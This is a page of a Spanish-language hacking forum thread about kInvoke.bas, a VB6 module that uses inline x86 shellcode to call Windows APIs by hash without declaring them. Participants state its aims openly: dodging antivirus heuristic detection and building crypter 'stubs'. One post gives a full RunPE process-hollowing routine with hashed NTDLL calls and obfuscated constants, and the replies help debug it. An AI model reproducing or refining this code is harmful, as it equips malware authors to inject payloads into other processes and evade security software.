[ASM+VB6][INVOKE] Llamas APIs sin declararlas

Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

Foro de elhacker.net

Programación

Programación Visual Basic (Moderadores: LeandroA, seba123neo, raul338)

[ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

0 Usuarios y 2 Visitantes están viendo este tema.

Páginas: 1 [2]

Autor

Tema: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas (Leído 6,611 veces)

nemit

Desconectado

Mensajes: 1

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #15 en: 26 Julio 2010, 08:11 »

Hi Karcrack.

Thx for kInvoke.

Everything runs fine in the code except the commentet Invoke Calls.
Maybe you know what im doing wrong?

Código

Option Explicit
 
Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long, ByVal dwBufLen As Long) As Long
Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long) As Long
Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
 
Private Const PROV_RSA_AES      As Long = 24
Private Const CRYPT_NEWKEYSET   As Long = 8
Private Const CALG_AES_256      As Long = 26128
Private Const CALG_SHA_512      As Long = 32782
Private Const CRYPT_CREATE_SALT As Long = &H4
 
Private Type OSVERSIONINFO
        dwOSVersionInfoSize     As Long
        dwMajorVersion          As Long
        dwMinorVersion          As Long
        dwBuildNumber           As Long
        dwPlatformId            As Long
        szCSDVersion            As String * 128
End Type
 
Private Const sAdvapi As String = "advapi32.dll"
Private Const sKernel As String = "kernel32.dll"
 
 
Public Function EnDecodeAES(ByVal sData As String, ByVal sPassword As String, ByVal bEncrypt As Boolean) As String
 
 Dim hHash As Long
 Dim hKey As Long
 Dim hCryptProv As Long
 Dim lData As Long
 Dim sGetServiceProvider As String
 Dim OS As OSVERSIONINFO
 
    OS.dwOSVersionInfoSize = Len(OS)
    Call Invoke(sKernel, &HC75FC483, VarPtr(OS))
 
    If OS.dwMajorVersion & OS.dwMinorVersion >= 60 Then
        sGetServiceProvider = "Microsoft Enhanced RSA and AES Cryptographic Provider"
    Else
        sGetServiceProvider = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
    End If
 
    Call Invoke(sAdvapi, &H43C28BF0, VarPtr(hCryptProv), 0, StrPtr(sGetServiceProvider), PROV_RSA_AES, CRYPT_NEWKEYSET)
    Call Invoke(sAdvapi, &H43C28BF0, VarPtr(hCryptProv), 0, StrPtr(sGetServiceProvider), PROV_RSA_AES, 0&)
    Call Invoke(sAdvapi, &H4105A130, hCryptProv, CALG_SHA_512, 0, 0, VarPtr(hHash))
 
    'Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
    'Call Invoke(sAdvapi, &HC2122629, hHash, sPassword, Len(sPassword), 0)
    ' without Invoke
    Call CryptHashData(hHash, sPassword, Len(sPassword), 0)
 
    Call Invoke(sAdvapi, &HC2122629, hHash, StrPtr(sPassword), Len(sPassword), 0)
    Call Invoke(sAdvapi, &HB56D274A, hCryptProv, CALG_AES_256, hHash, CRYPT_CREATE_SALT, VarPtr(hKey))
 
    lData = Len(sData)
    If bEncrypt Then
        sData = sData & Space(16)
 
        'Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long, ByVal dwBufLen As Long) As Long
        'Call Invoke(sAdvapi, &HD9242588, hKey, 0, 1, 0, sData, VarPtr(lData), Len(sData))
        ' without Invoke
        Call CryptEncrypt(hKey, 0, 1, 0, sData, lData, Len(sData))
 
    Else
 
        'Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, pdwDataLen As Long) As Long
        'Call Invoke(sAdvapi, &H59202584, hKey, 0, 1, 0, sData, VarPtr(lData))
        ' without Invoke
        Call CryptDecrypt(hKey, 0, 1, 0, sData, lData)
 
    End If
 
    EnDecodeAES = Left(sData, lData)
    Call Invoke(sAdvapi, &H25D4AE7A, hHash)
    Call Invoke(sAdvapi, &H95E24580, hKey)
    Call Invoke(sAdvapi, &H5AE8E894, hCryptProv, 0)
End Function


	En línea

Karcrack

Desconectado

Mensajes: 2.192

Se siente observado ¬¬'

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #16 en: 26 Julio 2010, 14:53 »

I'd like to see the working code without Invoke, so I'll be able to see if you pass some pointers wrong..


	En línea

Elemental Code

Desconectado

Mensajes: 499

Im beyond the system

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #17 en: 9 Diciembre 2010, 19:41 »

Porque visual basic me odia? Eh?

Quise ver si hacia magia con la deteccion por euristica de los AV y... NO ME ANDA :-(

Código

Call Invoke("urlmon", &H702F1A36, 0, StrPtr("http://d.imagehost.org/0187/Tron-Evolution-cover_1.jpg"), StrPtr("C:\Tron.jpg"), 0, 0)

Este es un codigo "bobo" con la UrLmon de URLTODOWNLOADFILE que baja una imagen al disco para probar.

Pero no baja la imagen ni me muestra ningun error ni nada.

En que le erre :S?


	En línea

Karcrack

Desconectado

Mensajes: 2.192

Se siente observado ¬¬'

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #18 en: 9 Diciembre 2010, 20:34 »

Comprueba que estes llamando a la version unicode del API... URLDownloadToFileW@URLMON...

La explicacion de porque hay que llamar a las versiones unicode de las APIs es porque al usar StrPtr() sacas el puntero a la cadena en formato unicode... si quisieses por alguna razon usar la version ascii deberias hacer la conversion manualmente por ejemplo con

Código

bvByteArray = StrConv(sCADENA, vbFromUnicode)

Un saludo


	En línea

Swellow

Desconectado

Mensajes: 36

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #19 en: 31 Octubre 2011, 23:58 »

Cita de: Karcrack en 22 Julio 2010, 18:53

He hecho una pequeña actualizacion para un nuevo modulo RunPe en el que estoy trabajando, asi que aqui esta:

Código

'Karcrack , 22/07/10
Option Explicit
Private Type DWORD_L
    D1      As Long
End Type
 
Private Type DWORD_B
    B1      As Byte:    B2      As Byte:   B3      As Byte:    B4      As Byte
End Type
 
'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
 
Private bInitialized_Inv        As Boolean
Private ASM_gAPIPTR(0 To 170)   As Byte
Private ASM_cCODE(0 To 255)     As Byte
 
Private Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
    Dim vItem                   As Variant
    Dim bsTmp                   As DWORD_B
    Dim lAPI                    As Long
    Dim i                       As Long
    Dim w                       As Long
 
    If Not bInitialized_Inv Then
        For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
                                &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
            ASM_gAPIPTR(i) = CByte(vItem)
            i = i + 1
        Next vItem
        i = 0
        bInitialized_Inv = True
    End If
 
    lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
 
    If lAPI Then
        For w = UBound(vParams) To LBound(vParams) Step -1
            vItem = vParams(w)
            bsTmp = SliceLong(CLng(vItem))
            '// PUSH ADDR
            ASM_cCODE(i) = &H68:            i = i + 1
            ASM_cCODE(i) = bsTmp.B1:        i = i + 1
            ASM_cCODE(i) = bsTmp.B2:        i = i + 1
            ASM_cCODE(i) = bsTmp.B3:        i = i + 1
            ASM_cCODE(i) = bsTmp.B4:        i = i + 1
        Next w
 
        bsTmp = SliceLong(lAPI)
        '// MOV EAX, ADDR
        ASM_cCODE(i) = &HB8:                i = i + 1
        ASM_cCODE(i) = bsTmp.B1:            i = i + 1
        ASM_cCODE(i) = bsTmp.B2:            i = i + 1
        ASM_cCODE(i) = bsTmp.B3:            i = i + 1
        ASM_cCODE(i) = bsTmp.B4:            i = i + 1
        '// CALL EAX
        ASM_cCODE(i) = &HFF:                i = i + 1
        ASM_cCODE(i) = &HD0:                i = i + 1
        '// RET
        ASM_cCODE(i) = &HC3:                i = i + 1
 
        Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
    Else
        Invoke = -1
        'Err.Raise -1, , "Bad Hash or wrong DLL"
    End If
End Function
 
Private Function SliceLong(ByVal lLong As Long) As DWORD_B
    Dim tL                      As DWORD_L
 
    tL.D1 = lLong
    LSet SliceLong = tL
End Function

Saludos

Thanks a lot for that code Karcrack, I tried to replace my call api by name by this one, I converted all api names to hash but then my stub gets broken. Is there anything else that has to be done?


	En línea

Karcrack

Desconectado

Mensajes: 2.192

Se siente observado ¬¬'

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #20 en: 1 Noviembre 2011, 03:49 »

Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...

Make sure you're generating the hashes using the complete function name... p.e MessageBoxA


« Última modificación: 1 Noviembre 2011, 03:53 por Karcrack »	En línea

Swellow

Desconectado

Mensajes: 36

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #21 en: 1 Noviembre 2011, 14:30 »

Cita de: Karcrack en 1 Noviembre 2011, 03:49

I've generated the hashes correctly using each complete function name, I used the tool you shared with us.

I'm on Windows 7 x64 bits and I'm compiling in Native Code

I never got the CallAPIByHash working, never understood why :/

My Stub was using CallAPIByName and it was working...


	En línea

[L]ord [R]NA

Desconectado

Mensajes: 1.507

El Dictador y Verdugo de H-Sec

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #22 en: 1 Noviembre 2011, 16:09 »

On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically


	En línea

H-Sec... Exclusividad Ante Todo (Nos reservamos el Derecho a Admision)

Swellow

Desconectado

Mensajes: 36

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #23 en: 1 Noviembre 2011, 17:26 »

Cita de: [L]ord [R]NA en 1 Noviembre 2011, 16:09

On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically

I have no idea on how to do this... Could you help me doing this please?


	En línea

Karcrack

Desconectado

Mensajes: 2.192

Se siente observado ¬¬'

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #24 en: 1 Noviembre 2011, 19:01 »

The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...


	En línea

Swellow

Desconectado

Mensajes: 36

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #25 en: 1 Noviembre 2011, 19:13 »

Cita de: Karcrack en 1 Noviembre 2011, 19:01

The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...

I don't know with which API's it's not working, how do I know? I have Invoked RunPE/Resource and a few APIs in Main:

Main Module:

Código:

'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile) ---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024 ---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024

Resource Module:

Código:

'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType) ---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc) ---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal) ---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc) ---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size ---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal ---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod ---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hMod

And all API's in kRunPE:

Código:

Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim gNumC As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim KERNEL32 As String
Dim NTDLL As String

KERNEL32 = "KERNEL32"
NTDLL = "NTDLL"

hModuleBase = VarPtr(bvBuff(0))

If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function

hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))

If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function

ImageBase = GetNumb(hPE + fClngW("&H34"))

tSTARTUPINFO(0) = fClngW("&H44")

'CreateProcessW
Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))

'NtUnmapViewOfSection
Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)

'NtAllocateVirtualMemory
Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))

'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)

For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
Next gNumC

tCONTEXT(0) = fClngW("65543")

'NtGetContextThread
Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))

'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))

tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))

'NtSetContextThread
Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))

'NtResumeThread
Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)

hProcess = tPROCESS_INFORMATION(0)
fInjectExe = fClngW("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
'NtWriteVirtualMemory
Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function


« Última modificación: 1 Noviembre 2011, 19:19 por Swellow »	En línea

Karcrack

Desconectado

Mensajes: 2.192

Se siente observado ¬¬'

Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

« Respuesta #26 en: 2 Noviembre 2011, 20:03 »

The code is pretty confusing... it's hard to follow the calls without looking at the original API declarations neither the structure declaration... anyway looks like your passing the pointers incorrectly... can't help you much more... you should look at the functions return... using Msgbox() is the easiest way.. also the worst :laugh:


	En línea

Páginas: 1 [2]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Introduccion a APIs y como evitar el uso de MSWINSCK.OCX con APIs Programación Visual Basic	Achernar	5	1,238	5 Julio 2007, 23:43 por Achernar
	Ayuda[Loadlibrary] Cargar apis sin declararlas. Programación Visual Basic	The Swash	3	1,861	1 Febrero 2010, 17:31 por Karcrack
	[VB6-SRC] mZombieInvoke - Llama APIs sin declararlas Programación Visual Basic	Karcrack	11	2,445	14 Agosto 2010, 21:14 por zOok
	Ayuda con el metodo Invoke y varias Dudas Sockets .NET	CATBro	2	611	28 Octubre 2011, 07:00 por CATBro
	[HELP] Invoke APIs Programación Visual Basic	Swellow	1	202	4 Mayo 2012, 10:01 por Swellow